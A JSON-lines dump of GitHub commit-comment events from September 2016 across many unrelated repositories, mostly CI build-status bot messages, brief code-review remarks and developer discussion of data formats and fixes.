{"id":"4586397043","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19087025,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T22:43:02Z","updated_at":"2016-09-19T22:43:02Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1766 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-19T22:43:02Z"}
{"id":"4586397450","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":19087027,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-19T22:43:08Z","updated_at":"2016-09-19T22:43:08Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.667.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76941&buildTypeId=bt323) outcome was **SUCCESS**\nSummary: Tests passed: 937, ignored: 56 Build time: 00:16:29"}},"created_at":"2016-09-19T22:43:08Z"}
{"id":"4586403383","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19087045,"position":4,"line":40,"path":"openstudiocore/ruby/init_openstudio.cpp","commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-19T22:44:40Z","updated_at":"2016-09-19T22:44:40Z","body":"https://github.com/ruby/ruby/blob/trunk/load.c#L572"}},"created_at":"2016-09-19T22:44:40Z"}
{"id":"4586405787","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087054,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T22:45:16Z","updated_at":"2016-09-19T22:45:16Z","body":"A SQL query is even better if someone is skilled enough to write it. Then we can just do it in 1.0.6_Updates.sql.\r\n\r\nIt's not too complicated if anyone wants to attempt it. Just select these from object_data:\r\n```sql\r\n('Land_DZE_GarageWoodDoorLocked','Land_DZE_LargeWoodDoorLocked','Land_DZE_WoodDoorLocked','CinderWallDoorLocked_DZ','CinderWallDoorSmallLocked_DZ','Plastic_Pole_EP1_DZ')\r\n```\r\n\r\nThen check the first element of `Inventory` for an array that contains two strings:\r\n```sqf\r\n[\"playerUID\",\"playerName\"]\r\n```\r\nThe updated format will be a string and an array:\r\n```sqf\r\n[\"playerUID\",[101,66,97,121]]\r\n```\r\n\r\nTo convert each player name to an array each letter is replaced with the corresponding decimal number for that unicode character:\r\nhttps://en.wikipedia.org/wiki/List_of_Unicode_characters#Basic_Latin\r\nYou only need to worry about 32-126 as I believe it is only capable of storing ASCII right now."}},"created_at":"2016-09-19T22:45:16Z"}
{"id":"4586408006","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19087063,"position":null,"line":null,"path":null,"commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-19T22:45:50Z","updated_at":"2016-09-19T22:45:50Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-19T22:45:50Z"}
{"id":"4586411295","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19087070,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-19T22:46:43Z","updated_at":"2016-09-19T22:46:43Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T22:46:43Z"}
{"id":"4586412292","type":"CommitCommentEvent","actor":{"login":"amaitland"},"repo":{"name":"cefsharp/CefSharp"},"payload":{"comment":{"id":19087075,"position":null,"line":null,"path":null,"commit_id":"7ea838780275ad09639558aeb73bfd896a94e9cd","created_at":"2016-09-19T22:46:59Z","updated_at":"2016-09-19T22:46:59Z","body":"This needs to be a Pull request of it's own. "}},"created_at":"2016-09-19T22:46:59Z"}
{"id":"4586412629","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19087077,"position":null,"line":null,"path":null,"commit_id":"ba496e24d13ac1711e4d954424a41dbe3cfdd924","created_at":"2016-09-19T22:47:06Z","updated_at":"2016-09-19T22:47:06Z","body":"I screwed up on the Constructor design, gotta fix that..."}},"created_at":"2016-09-19T22:47:06Z"}
{"id":"4586413411","type":"CommitCommentEvent","actor":{"login":"kasper93"},"repo":{"name":"XhmikosR/mpc-hc"},"payload":{"comment":{"id":19087081,"position":null,"line":null,"path":null,"commit_id":"9b21a5e057c4bb07ef27b11412a816abc20fc445","created_at":"2016-09-19T22:47:17Z","updated_at":"2016-09-19T22:47:17Z","body":"@clsid2: Yes."}},"created_at":"2016-09-19T22:47:17Z"}
{"id":"4586413672","type":"CommitCommentEvent","actor":{"login":"Gottox"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19087083,"position":null,"line":null,"path":null,"commit_id":"47b5971bd47cbd98c6db0ec17908ee18e546fa11","created_at":"2016-09-19T22:47:20Z","updated_at":"2016-09-19T22:47:20Z","body":"Np :)"}},"created_at":"2016-09-19T22:47:20Z"}
{"id":"4586413819","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19087085,"position":null,"line":null,"path":null,"commit_id":"ba496e24d13ac1711e4d954424a41dbe3cfdd924","created_at":"2016-09-19T22:47:23Z","updated_at":"2016-09-19T22:47:23Z","body":"Not supposed have user define string."}},"created_at":"2016-09-19T22:47:23Z"}
{"id":"4586419371","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"romhackhispano/klint-psk.romhackhispano.org"},"payload":{"comment":{"id":19087097,"position":120,"line":61,"path":"pry-fe3.html","commit_id":"a4c1032d1cd2d8fe6b44b5e1cd78c397d1a15dde","created_at":"2016-09-19T22:48:48Z","updated_at":"2016-09-19T22:48:48Z","body":"Estas cosas lo mejor es que las cambies por `<?php $numImg = 5; ?>`\r\nLos que sea `<?= $expr ?>` los puedes cambiar por `<?php echo $expr; ?>`"}},"created_at":"2016-09-19T22:48:48Z"}
{"id":"4586421641","type":"CommitCommentEvent","actor":{"login":"loganmc10"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19087105,"position":null,"line":null,"path":null,"commit_id":"8dad84cc39571c295d10a3b3c9326fa942478fcd","created_at":"2016-09-19T22:49:23Z","updated_at":"2016-09-19T22:49:23Z","body":"I'm seeing some depth issues on Zelda OoT (Android GLES2), when I push Z, or pull up the ocarina, I just see the background/sky"}},"created_at":"2016-09-19T22:49:23Z"}
{"id":"4586421704","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087106,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T22:49:24Z","updated_at":"2016-09-19T22:49:24Z","body":"It's only a problem when the list is displayed, you could just check typename and convert it when showing the lists."}},"created_at":"2016-09-19T22:49:24Z"}
{"id":"4586422105","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19087108,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T22:49:31Z","updated_at":"2016-09-19T22:49:31Z","body":"patch-1 (felixonmars) - i386-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T22:49:31Z"}
{"id":"4586422336","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19087109,"position":null,"line":null,"path":null,"commit_id":"ba496e24d13ac1711e4d954424a41dbe3cfdd924","created_at":"2016-09-19T22:49:36Z","updated_at":"2016-09-19T22:49:36Z","body":"Oh, nevermind, it works fine."}},"created_at":"2016-09-19T22:49:36Z"}
{"id":"4586428907","type":"CommitCommentEvent","actor":{"login":"Ekultek"},"repo":{"name":"Ekultek/whitewidow"},"payload":{"comment":{"id":19087121,"position":null,"line":null,"path":null,"commit_id":"c1e5760330f66208170a5a0bb7c58b018d7e09ce","created_at":"2016-09-19T22:51:20Z","updated_at":"2016-09-19T22:51:20Z","body":"I'd love to however my IP range is banned lol, for my phone it is anyways"}},"created_at":"2016-09-19T22:51:20Z"}
{"id":"4586431552","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087128,"position":86,"line":86,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:52:03Z","updated_at":"2016-09-19T22:52:03Z","body":"Можно было написать проще - лишнее вычитание + длинная тернарная операция."}},"created_at":"2016-09-19T22:52:03Z"}
{"id":"4586432425","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zetekla/mantis_live_dev"},"payload":{"comment":{"id":19087131,"position":67,"line":210,"path":"core/helper_util.php","commit_id":"e3615f0f0ecd27134af66cceb952c73faa4f9108","created_at":"2016-09-19T22:52:17Z","updated_at":"2016-09-19T22:52:17Z","body":"while in NodeJS fs.statSync is used, `filemtime` is the method in PHP"}},"created_at":"2016-09-19T22:52:17Z"}
{"id":"4586432592","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19087132,"position":23,"line":96,"path":"src/app/esp8266/tcpnew.fth","commit_id":"322fa90a81f5b99d7c0f31a75007017a17a70406","created_at":"2016-09-19T22:52:20Z","updated_at":"2016-09-19T22:52:20Z","body":"Ok."}},"created_at":"2016-09-19T22:52:20Z"}
{"id":"4586435091","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087137,"position":99,"line":99,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:53:00Z","updated_at":"2016-09-19T22:53:00Z","body":"Такой конструктор можно было не добавлять. Конструктор по умолчанию создаётся только в случае отсутствия других конструкторов, а здесь такой есть."}},"created_at":"2016-09-19T22:53:00Z"}
{"id":"4586437731","type":"CommitCommentEvent","actor":{"login":"oiad"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087142,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T22:53:40Z","updated_at":"2016-09-19T22:53:40Z","body":"That's not true, the item won't even spawn in when I have had it happen.\n\nOn 20 September 2016 10:49:28 AM NZST, Kobayashi <notifications@github.com> wrote:\n>It's only a problem when the list is displayed, you could just check\n>typename and convert it when showing the lists.\n>\n>-- \n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/EpochModTeam/DayZ-Epoch/commit/fe9b8fdcb4b5cf069e0cc287b97785a3448817c8#commitcomment-19087106\n"}},"created_at":"2016-09-19T22:53:40Z"}
{"id":"4586439761","type":"CommitCommentEvent","actor":{"login":"ferrafmz"},"repo":{"name":"briangerez/TP3-Polinomios"},"payload":{"comment":{"id":19087143,"position":null,"line":null,"path":null,"commit_id":"05753d0ff916f520073a25f2c6f05ec77837288f","created_at":"2016-09-19T22:54:11Z","updated_at":"2016-09-19T22:54:11Z","body":"Se agregó el evaluarHorner().\r\nFalta el punto 4."}},"created_at":"2016-09-19T22:54:11Z"}
{"id":"4586441668","type":"CommitCommentEvent","actor":{"login":"blakelewis"},"repo":{"name":"libopenstorage/openstorage"},"payload":{"comment":{"id":19087146,"position":2,"line":74,"path":"README.md","commit_id":"6d4ad595b10d923ef24df3dbd100426fbd49fec7","created_at":"2016-09-19T22:54:37Z","updated_at":"2016-09-19T22:54:37Z","body":"It would be nice to fix the spelling errors in this line."}},"created_at":"2016-09-19T22:54:37Z"}
{"id":"4586441754","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19087147,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T22:54:39Z","updated_at":"2016-09-19T22:54:39Z","body":"check out /device/qcom/sepolicy/common/file_contexts\r\nlines 154,153,176 "}},"created_at":"2016-09-19T22:54:39Z"}
{"id":"4586441993","type":"CommitCommentEvent","actor":{"login":"vaznoe"},"repo":{"name":"vaznoe/my_repo"},"payload":{"comment":{"id":19087148,"position":null,"line":null,"path":null,"commit_id":"a52854452bf959ea98a2be6ee2d6cc0b104444fb","created_at":"2016-09-19T22:54:42Z","updated_at":"2016-09-19T22:54:42Z","body":"Test"}},"created_at":"2016-09-19T22:54:42Z"}
{"id":"4586442867","type":"CommitCommentEvent","actor":{"login":"LegacyHardware"},"repo":{"name":"EdgeAOSP/platform_manifest"},"payload":{"comment":{"id":19087152,"position":null,"line":null,"path":null,"commit_id":"fe09f0af73e91ed3d0151ca7b9c0d120c2c95b90","created_at":"2016-09-19T22:54:56Z","updated_at":"2016-09-19T22:54:56Z","body":"TFW Autocorrect changes \"Edgify Readme\" to \"Edgily ready\""}},"created_at":"2016-09-19T22:54:56Z"}
{"id":"4586443022","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087153,"position":109,"line":109,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:54:59Z","updated_at":"2016-09-19T22:54:59Z","body":"Здесь несколько нарушится контракт на next - будет возвращаться IndexOutOfBoundsException вместо NoSuchElementException. Но об исключениях на следующем занятии."}},"created_at":"2016-09-19T22:54:59Z"}
{"id":"4586448075","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087162,"position":63,"line":63,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:56:15Z","updated_at":"2016-09-19T22:56:15Z","body":"Попробуйте с List + listIterator или Deque + descendingIterator"}},"created_at":"2016-09-19T22:56:15Z"}
{"id":"4586448653","type":"CommitCommentEvent","actor":{"login":"yuya-oc"},"repo":{"name":"Razzeee/desktop"},"payload":{"comment":{"id":19087163,"position":23,"line":34,"path":"src/main.js","commit_id":"1092aa3f547efc85f882e7e1c79033b2dcc71662","created_at":"2016-09-19T22:56:23Z","updated_at":"2016-09-19T22:56:23Z","body":"I'm not sure why. I had read that part, so I also thought only `enable` is enough. Possibly `return appLauncher.enable();` might be enough here due to Promise."}},"created_at":"2016-09-19T22:56:23Z"}
{"id":"4586448980","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19087165,"position":4,"line":53,"path":"handlers/changes.js","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-19T22:56:29Z","updated_at":"2016-09-19T22:56:29Z","body":"Accidental I assume?"}},"created_at":"2016-09-19T22:56:29Z"}
{"id":"4586449271","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19087167,"position":12,"line":217,"path":"handlers/changes.js","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-19T22:56:33Z","updated_at":"2016-09-19T22:56:33Z","body":"As above"}},"created_at":"2016-09-19T22:56:33Z"}
{"id":"4586449890","type":"CommitCommentEvent","actor":{"login":"roalcantara"},"repo":{"name":"equalize-squad/equalize"},"payload":{"comment":{"id":19087168,"position":7,"line":17,"path":"app/views/requirements/_table.html.slim","commit_id":"2cbac8555917380fdf969a9fc18ef26ddcbafd50","created_at":"2016-09-19T22:56:43Z","updated_at":"2016-09-19T22:56:43Z","body":"@ddomingues is this panel that I should get back, right? Without it we could have a problem with heights, right? I didn't get how, tho. Could you explain it to me? 😅"}},"created_at":"2016-09-19T22:56:43Z"}
{"id":"4586453259","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087173,"position":75,"line":75,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:57:39Z","updated_at":"2016-09-19T22:57:39Z","body":"Можно использовать информацию о длине строки (+ придётся добавить предположение о кодировке файла), чтобы получить число строк и использовать это при работе с ArrayList'ом."}},"created_at":"2016-09-19T22:57:39Z"}
{"id":"4586453331","type":"CommitCommentEvent","actor":{"login":"llfkj"},"repo":{"name":"kivy/kivy"},"payload":{"comment":{"id":19087174,"position":null,"line":null,"path":null,"commit_id":"c95166611af0138006a2a005c84e8651e2cf6d71","created_at":"2016-09-19T22:57:40Z","updated_at":"2016-09-19T22:57:40Z","body":"Line 87 of that looks like a typo, no? i.e. `not i or i == l_children` isn't a fully formed statement"}},"created_at":"2016-09-19T22:57:40Z"}
{"id":"4586457786","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"akgrad/jschool"},"payload":{"comment":{"id":19087187,"position":47,"line":47,"path":"src/ru/sberbank/school/TestCollections.java","commit_id":"00a53bdc91e0d9383b38ac852e14d7fea4deaced","created_at":"2016-09-19T22:58:50Z","updated_at":"2016-09-19T22:58:50Z","body":"Здесь присутствует некоторая некрасивость, которую обязательно стоит избегать - 2 места, где используется метод put"}},"created_at":"2016-09-19T22:58:50Z"}
{"id":"4586459282","type":"CommitCommentEvent","actor":{"login":"jwagantall"},"repo":{"name":"CyanogenMod/android_frameworks_av"},"payload":{"comment":{"id":19087195,"position":null,"line":null,"path":null,"commit_id":"9b5caa8d9ee6cfd96793e9a60acc0448ab6be08a","created_at":"2016-09-19T22:59:14Z","updated_at":"2016-09-19T22:59:14Z","body":"This has been resolved in external/mm-dash"}},"created_at":"2016-09-19T22:59:14Z"}
{"id":"4586461731","type":"CommitCommentEvent","actor":{"login":"RouxRC"},"repo":{"name":"medialab/hyphe-browser"},"payload":{"comment":{"id":19087201,"position":5,"line":88,"path":"app/components/browser/BrowserTab.js","commit_id":"64f1941a5dc1b968576f0dcb310f8ff63ae06661","created_at":"2016-09-19T22:59:54Z","updated_at":"2016-09-19T22:59:54Z","body":"good to know! will check :)"}},"created_at":"2016-09-19T22:59:54Z"}
{"id":"4586461919","type":"CommitCommentEvent","actor":{"login":"ferrafmz"},"repo":{"name":"briangerez/TP3-Polinomios"},"payload":{"comment":{"id":19087202,"position":null,"line":null,"path":null,"commit_id":"03c43a87d29267d40ef0237a7bd9cc078374a80b","created_at":"2016-09-19T22:59:57Z","updated_at":"2016-09-19T22:59:57Z","body":"Actualizado con más pruebas"}},"created_at":"2016-09-19T22:59:57Z"}
{"id":"4586465529","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19087213,"position":88,"line":88,"path":"scripts/e2e/create_fixtures","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-19T23:00:49Z","updated_at":"2016-09-19T23:00:49Z","body":"This file (as with all scripts) would be much easier to read as a node file. You could use PouchDB and JSON rather than curl and strings. I can't see any advantage to having this as a bash script..."}},"created_at":"2016-09-19T23:00:49Z"}
{"id":"4586470015","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087235,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T23:01:59Z","updated_at":"2016-09-19T23:01:59Z","body":"I must not have applied that change to my server monitor then. I'm still using a custom one since it still takes over 2 minutes to start accepting logins with 7k items"}},"created_at":"2016-09-19T23:01:59Z"}
{"id":"4586478673","type":"CommitCommentEvent","actor":{"login":"pyk"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19087264,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-19T23:03:55Z","updated_at":"2016-09-19T23:03:55Z","body":"@elyase for `model.words`, the order is not important. To handle case like \r\n\r\n> to prune the vocabulary by frequency\r\n\r\nshould be handled before initializing the model, for example `fasttext.classifier(...., min_count=4)`"}},"created_at":"2016-09-19T23:03:55Z"}
{"id":"4586480518","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19087268,"position":null,"line":null,"path":null,"commit_id":"47d00bcede8acca40a2243157f4dfdb35c6ab8de","created_at":"2016-09-19T23:04:23Z","updated_at":"2016-09-19T23:04:23Z","body":"It only now hit me I had to re-test all older samples 😨 but I just did and all is fine (exactly the same output).\r\nThis was a good fix, because we'll get something to crack even from an auth with a hidden network. The manual way using the -e option should be pretty much obsoleted by this but is still a good fallback to have eg. if your sniffer suffers from packet loss (AP further away than client)."}},"created_at":"2016-09-19T23:04:23Z"}
{"id":"4586480577","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-api"},"payload":{"comment":{"id":19087270,"position":62,"line":62,"path":"tests/e2e/handlers/changes.js","commit_id":"0a12516b38907363f9907854784319c2317a3e82","created_at":"2016-09-19T23:04:24Z","updated_at":"2016-09-19T23:04:24Z","body":"Looks like this TODO is TODONE?"}},"created_at":"2016-09-19T23:04:24Z"}
{"id":"4586482973","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19087281,"position":null,"line":null,"path":null,"commit_id":"c2a728a6d2c8a51b300479919b9d1b17f771444c","created_at":"2016-09-19T23:05:04Z","updated_at":"2016-09-19T23:05:04Z","body":"++"}},"created_at":"2016-09-19T23:05:04Z"}
{"id":"4586483153","type":"CommitCommentEvent","actor":{"login":"greenlaw110"},"repo":{"name":"rythmengine/rythmengine"},"payload":{"comment":{"id":19087283,"position":null,"line":null,"path":null,"commit_id":"e088577eb5a25ca06c9c4d9b55f90411af1fed87","created_at":"2016-09-19T23:05:07Z","updated_at":"2016-09-19T23:05:07Z","body":"@WolfgangFahl can we keep in JDK 1.6? Based on [this](https://plumbr.eu/blog/java/java-version-and-vendor-data-analyzed-2016-edition) report, there are still 10% Java 1.6 users, I don't think we should ignore them"}},"created_at":"2016-09-19T23:05:07Z"}
{"id":"4586483889","type":"CommitCommentEvent","actor":{"login":"Skellyboy38"},"repo":{"name":"Skellyboy38/SOEN-343-NullPointer"},"payload":{"comment":{"id":19087285,"position":null,"line":null,"path":null,"commit_id":"6d15c270349992a8fe8ddd67599610dc1febcb5f","created_at":"2016-09-19T23:05:18Z","updated_at":"2016-09-19T23:05:18Z","body":"This looks good to me David. You can move this to the \"done\" column :)"}},"created_at":"2016-09-19T23:05:18Z"}
{"id":"4586488689","type":"CommitCommentEvent","actor":{"login":"nikolricano"},"repo":{"name":"nikolricano/desafiolatam"},"payload":{"comment":{"id":19087300,"position":null,"line":null,"path":null,"commit_id":"fe79724160487ec986237b3c024d18f1c5de1dab","created_at":"2016-09-19T23:06:38Z","updated_at":"2016-09-19T23:06:38Z","body":"La diferencia entre github y git \r\n\r\nGitHub es una plataforma que aloja proyectos utilizando el sistema de control de versiones Git. Utiliza el framework Ruby on Railspor GitHub, Inc.\r\n\r\nGIT es el software que rastrea. El sistema de control de versiones. La herramienta que utilizaremos en la terminal.\r\n\r\n\r\nGitHub es la plataforma de \"hosting\" de los proyectos. Una comunidad llena de personas que desarrollan y comparten, usando GIT. \r\n\r\nSe complementan, pero son personajes independientes."}},"created_at":"2016-09-19T23:06:38Z"}
{"id":"4586491454","type":"CommitCommentEvent","actor":{"login":"sbx320"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19087310,"position":6,"line":1701,"path":"Server/mods/deathmatch/logic/CConsoleCommands.cpp","commit_id":"6b76656f4ac0f94322007a88aa4a0d2ae63cc3c4","created_at":"2016-09-19T23:07:20Z","updated_at":"2016-09-19T23:07:20Z","body":"I think this should be !="}},"created_at":"2016-09-19T23:07:20Z"}
{"id":"4586493649","type":"CommitCommentEvent","actor":{"login":"elyase"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19087315,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-19T23:07:55Z","updated_at":"2016-09-19T23:07:55Z","body":"I am still on the previous version (where `model.words` is a list) because I noticed that they are sorted by frequency and sometimes I use the first 100 or so words as the stopwords for my vocabulary."}},"created_at":"2016-09-19T23:07:55Z"}
{"id":"4586506002","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19087342,"position":null,"line":null,"path":null,"commit_id":"63c7f01c83f49611d17081f9ff78ea6da4e74290","created_at":"2016-09-19T23:11:14Z","updated_at":"2016-09-19T23:11:14Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n"}},"created_at":"2016-09-19T23:11:14Z"}
{"id":"4586510023","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19087351,"position":null,"line":null,"path":null,"commit_id":"717f2b4a776f5c2f9bb8a781388e2249be44bedb","created_at":"2016-09-19T23:12:18Z","updated_at":"2016-09-19T23:12:18Z","body":"#7 Can add an independent task\r\nCan also add task assigned to company\r\nDelete company -> delete all tasks associated with company"}},"created_at":"2016-09-19T23:12:18Z"}
{"id":"4586512397","type":"CommitCommentEvent","actor":{"login":"dschwen"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19087360,"position":12,"line":43,"path":"modules/phase_field/src/action/MaterialVectorGradAuxKernelAction.C","commit_id":"858f36ba40e02cde66f640f894bd33ee8f114465","created_at":"2016-09-19T23:12:55Z","updated_at":"2016-09-19T23:12:55Z","body":"do \r\n\r\n```\r\nconst std::vector<char> suffix = {'x', 'y', 'z'};\r\nvarname += suffix[x];\r\n``` "}},"created_at":"2016-09-19T23:12:55Z"}
{"id":"4586516347","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19087373,"position":null,"line":null,"path":null,"commit_id":"f6301008cc551a18f04bb62af7f9a971652fa88f","created_at":"2016-09-19T23:14:02Z","updated_at":"2016-09-19T23:14:02Z","body":"yes we could, it didn't help, it won't affect release actually I didn't see any effect yet."}},"created_at":"2016-09-19T23:14:02Z"}
